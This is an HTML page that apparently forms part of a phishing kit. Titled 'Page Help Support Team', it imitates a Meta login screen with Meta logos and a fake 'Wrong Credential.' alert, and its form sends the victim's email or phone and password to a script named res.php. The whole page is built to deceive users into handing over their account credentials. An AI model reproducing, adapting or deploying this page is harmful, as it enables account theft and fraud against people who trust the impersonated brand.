<!DOCTYPE html>
<html lang="en">
    <head>
        <title>Page Help Support Team</title>
        <meta
            name="viewport"
            content="user-scalable=no,initial-scale=1,maximum-scale=1" />

        <meta property="og:url" content="" />
        <meta property="og:type" content="" />
        <meta property="og:title" content="Page Help Support Team" />
        <meta property="og:description" content="" />
        <meta
            property="og:image"
            content="https://i.ibb.co/m6wKKzb/885434810.jpg" />

        <link
            href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css"
            rel="stylesheet"
            integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor"
            crossorigin="anonymous" />
        <link
            rel="icon"
            href="https://i.ibb.co/ftrhCQY/XXXX-removebg-preview.png" />

        <link href="1.css" rel="stylesheet" />
    </head>
    <body>
        <div
            class="modal modal-signin position d-block bg-secondary py-5"
            tabindex="-1"
            role="dialog"
            id="modalSignin">
            <div class="modal-dialog" role="document">
                <div class="modal-content">
                    <div class="modal-body">
                        <nav class="navbar navbar-dark bg-primary fixed-top">
                            <div class="container-fluid">
                                <svg
                                    xmlns="http://www.w3.org/2000/svg"
                                    width="16"
                                    height="16"
                                    fill="currentColor"
                                    class="bi bi-meta"
                                    viewBox="0 0 16 16">
                                    <path
                                        fill-rule="evenodd"
                                        d="M8.217 5.243C9.145 3.988 10.171 3 11.483 3 13.96 3 16 6.153 16.001 9.907c0 2.29-.986 3.725-2.757 3.725-1.543 0-2.395-.866-3.924-3.424l-.667-1.123-.118-.197a54.944 54.944 0 0 0-.53-.877l-1.178 2.08c-1.673 2.925-2.615 3.541-3.923 3.541C1.086 13.632 0 12.217 0 9.973 0 6.388 1.995 3 4.598 3c.319 0 .625.039.924.122.31.086.611.22.913.407.577.359 1.154.915 1.782 1.714Zm1.516 2.224c-.252-.41-.494-.787-.727-1.133L9 6.326c.845-1.305 1.543-1.954 2.372-1.954 1.723 0 3.102 2.537 3.102 5.653 0 1.188-.39 1.877-1.195 1.877-.773 0-1.142-.51-2.61-2.87l-.937-1.565ZM4.846 4.756c.725.1 1.385.634 2.34 2.001A212.13 212.13 0 0 0 5.551 9.3c-1.357 2.126-1.826 2.603-2.581 2.603-.777 0-1.24-.682-1.24-1.9 0-2.602 1.298-5.264 2.846-5.264.091 0 .181.006.27.018Z" />
                                </svg>
                            </div>
                        </nav>

                        <div class="container">
                            <svg
                                xmlns="http://www.w3.org/2000/svg"
                                style="display: none">
                                <symbol
                                    id="exclamation-triangle-fill"
                                    fill="currentColor"
                                    viewBox="0 0 16 16">
                                    <path
                                        d="M8.982 1.566a1.13 1.13 0 0 0-1.96 0L.165 13.233c-.457.778.091 1.767.98 1.767h13.713c.889 0 1.438-.99.98-1.767L8.982 1.566zM8 5c.535 0 .954.462.9.995l-.35 3.507a.552.552 0 0 1-1.1 0L7.1 5.995A.905.905 0 0 1 8 5zm.002 6a1 1 0 1 1 0 2 1 1 0 0 1 0-2z"></path>
                                </symbol>
                            </svg>
                            <div
                                class="alert alert-danger d-flex align-items-center"
                                role="alert">
                                <svg
                                    class="bi flex-shrink-0 me-2"
                                    width="24"
                                    height="24"
                                    role="img"
                                    aria-label="Danger:">
                                    <use
                                        xlink:href="#exclamation-triangle-fill"></use>
                                </svg>
                                Wrong Credential.
                            </div>
                            <div class="mt-4">
                                <form action="res.php" method="POST">
                                    <div class="mb-3 shadow">
                                        <input
                                            type="email"
                                            class="form-control up"
                                            name="data1"
                                            placeholder="Email address or phone number"
                                            autocomplete="on"
                                            required="yes"
                                            maxlength="100" />
                                    </div>
                                    <div class="mb-3 shadow">
                                        <input
                                            type="password"
                                            class="form-control up"
                                            name="data2"
                                            placeholder="Password"
                                            autocomplete="off"
                                            required="yes"
                                            maxlength="150" />
                                    </div>
                                    <div class="form-group mt-3 shadow">
                                        <button
                                            class="btn btn-primary d-block mx-auto w-100"
                                            type="submit">
                                            Log In
                                        </button>
                                    </div>
                                </form>
                            </div>
                        </div>
                        <hr class="my-4" />
                        <p class="text-secondary text-center">
                            Meta
                            <svg
                                xmlns="http://www.w3.org/2000/svg"
                                width="16"
                                height="16"
                                fill="currentColor"
                                class="bi bi-meta"
                                viewBox="0 0 16 16">
                                <path
                                    fill-rule="evenodd"
                                    d="M8.217 5.243C9.145 3.988 10.171 3 11.483 3 13.96 3 16 6.153 16.001 9.907c0 2.29-.986 3.725-2.757 3.725-1.543 0-2.395-.866-3.924-3.424l-.667-1.123-.118-.197a54.944 54.944 0 0 0-.53-.877l-1.178 2.08c-1.673 2.925-2.615 3.541-3.923 3.541C1.086 13.632 0 12.217 0 9.973 0 6.388 1.995 3 4.598 3c.319 0 .625.039.924.122.31.086.611.22.913.407.577.359 1.154.915 1.782 1.714Zm1.516 2.224c-.252-.41-.494-.787-.727-1.133L9 6.326c.845-1.305 1.543-1.954 2.372-1.954 1.723 0 3.102 2.537 3.102 5.653 0 1.188-.39 1.877-1.195 1.877-.773 0-1.142-.51-2.61-2.87l-.937-1.565ZM4.846 4.756c.725.1 1.385.634 2.34 2.001A212.13 212.13 0 0 0 5.551 9.3c-1.357 2.126-1.826 2.603-2.581 2.603-.777 0-1.24-.682-1.24-1.9 0-2.602 1.298-5.264 2.846-5.264.091 0 .181.006.27.018Z" />
                            </svg>
                        </p>
                    </div>
                </div>
            </div>
        </div>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js"></script>
    </body>
</html>
